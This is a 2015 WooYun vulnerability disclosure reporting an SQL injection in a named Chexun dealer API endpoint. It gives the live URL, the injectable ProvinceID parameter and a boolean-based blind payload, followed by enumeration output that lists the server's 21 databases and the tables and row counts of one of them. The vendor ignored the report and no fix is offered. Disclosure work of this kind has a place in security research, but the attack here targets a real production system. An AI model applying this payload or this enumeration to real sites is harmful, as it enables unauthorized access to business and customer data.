当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151634

漏洞标题:车讯网某站存在sql注射

相关厂商:车讯网

漏洞作者: Hancock

提交时间:2015-11-04 12:37

修复时间:2015-11-09 12:38

公开时间:2015-11-09 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

车讯网某站存在sql注射

详细说明:

ProvinceID参数:

http://dealer.chexun.com/API/GetDealersByBrandIdOrCompanyId.ashx?ProvinceID=3


Payload:

---
Parameter: ProvinceID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ProvinceID=3 AND 6524=6524
---


21个库

available databases [21]:
[*] CheBaiKe
[*] DBAiKaZhuaQu
[*] DBCarSite
[*] DBCharacterLibrary
[*] DBComment
[*] DBDealersShop
[*] DBDingYue
[*] DBDoublue11
[*] DBFeedback
[*] DBSMS
[*] DBTuangou
[*] DBUCenter
[*] DBVoting
[*] DBWapNews
[*] distribution
[*] master
[*] model
[*] msdb
[*] ProjectManagement
[*] tempdb
[*] ZhaoCheGameDB

漏洞证明:

Database: DBDealersShop
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| dbo.Shop_Access_Log | 3456993 |
| dbo.NewCarPublish_Tab | 2615828 |
| dbo.Dealer_HuoYue | 2137347 |
| dbo.Dealers_Shop_Notice_Cheap | 403031 |
| dbo.Dealers_Brand_Series_Tab | 283743 |
| dbo.Dealers_XunJia_Orders_Tab | 160857 |
| dbo.Dealers_Shop_Notice_Tab | 151409 |
| dbo.View_XianSuo | 151316 |
| dbo.LoginLog | 83951 |
| dbo.Dealers_Tab_ZhuaQu | 75521 |
| dbo.Dealers_TJ_Log | 66837 |
| dbo.Dealers_Shop_Notice_Pic | 44107 |
| dbo.Dealers_Shop_Photos_Tab | 35897 |
| dbo.Dealers_Tab | 28020 |
| dbo.ModelPrice_Tab | 28013 |
| dbo.Dealer_Record_OP | 24149 |
| dbo.DealersMessages_Tab | 19588 |
| dbo.Dealers_Saler_Team_Tab | 19174 |
| dbo.bbbb | 16086 |
| dbo.Dealer_ZiZhangHu | 12594 |
| dbo.dealer_new | 12136 |
| dbo.CAR_MODEL | 11620 |
| dbo.System_Notice_Send_Tab | 11545 |
| dbo.Dealers_Car_Orders_tab | 11108 |
| dbo.Buy_ShenQing | 8511 |
| dbo.Buy_ShenQing_Log_Model | 7208 |
| dbo.Buy_Order | 7100 |
| dbo.Buy_Order_YanZhengMa | 4233 |
| dbo.CAR_years | 2916 |
| dbo.COMMON_REGIONAL | 2873 |
| dbo.aa | 2846 |
| dbo.DealersPhoneLog_Tab | 2189 |
| dbo.Dealer_XunJia_DealerCount_Log | 1980 |
| dbo.Buy_ShengQing_Log | 1943 |
| dbo.Dealer_400_Recored | 1544 |
| dbo.CAR_series | 1498 |
| dbo.DealersTheme_Tab | 1492 |
| dbo.Buy_BaoZhengJin_LiuShui | 971 |
| dbo.Dealers_Register_Tab | 931 |
| dbo.Dealers_XunJia_Orders_Tab_20150320bak | 903 |
| dbo.Dealer_ZiZhangHu_Log | 824 |
| dbo.Buy_HuoDong_CheYuan | 492 |
| dbo.Dealers_Fast_Reply_Tab | 370 |
| dbo.City_Tab | 364 |
| dbo.Buy_ZiZhi | 305 |
| dbo.Dealers_Tab_ZhuaQu_City | 305 |
| dbo.Dealers_Tab_ZhuaQu_Brand | 284 |
| dbo.BuChong | 280 |
| dbo.PangDa | 200 |
| dbo.RiChanDealers | 198 |
| dbo.Buy_Dealer_ZhangHu | 191 |
| dbo.Dealers_AddCarLog | 156 |
| dbo.CAR_company | 146 |
| dbo.Dealers_Contract | 146 |
| dbo.Order_Return | 142 |
| dbo.SaleTemp | 124 |
| dbo.CAR_Brand | 122 |
| dbo.XianSuo_Record | 119 |
| dbo.Buy_BaoZhengJin_Log | 115 |
| dbo.Buy_ShenQing_KuCun | 109 |
| dbo.Dealer_TelKTJB_Recored | 93 |
| dbo.Buy_HuoDong_Log | 67 |
| dbo.LevelLimits_Tab | 59 |
| dbo.Buy_HuoDong | 50 |
| dbo.Dealers_Agent | 48 |
| dbo.Province_Tab | 34 |
| dbo.News_Tab | 29 |
| dbo.Dealers_Advice | 26 |
| dbo.Buy_MaintainceService | 20 |
| dbo.System_Notice_Tab | 14 |
| dbo.Buy_DingJin_Item | 11 |
| dbo.Mall_Lishi | 10 |
| dbo.Dealer_Mall_Respone | 9 |
| dbo.Region_Tab | 9 |
| dbo.Dealer_Shop_ShenQing | 8 |
| dbo.ZhiHuanGouChe | 8 |
| dbo.Buy_ZhangHu | 1 |
| dbo.Dealers_limits_Tab | 1 |
+-------------------------------------------+---------+

修复方案:

:(

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-09 12:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无